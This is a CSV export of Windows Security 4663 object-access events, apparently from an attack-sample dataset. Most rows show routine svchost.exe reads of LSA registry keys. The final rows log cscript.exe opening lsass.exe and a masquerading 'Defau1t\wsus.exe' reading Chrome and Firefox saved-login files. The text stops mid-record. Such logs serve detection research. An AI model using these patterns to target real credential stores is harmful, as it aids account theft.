\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL 
SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + 
+ + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 
+ 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + 
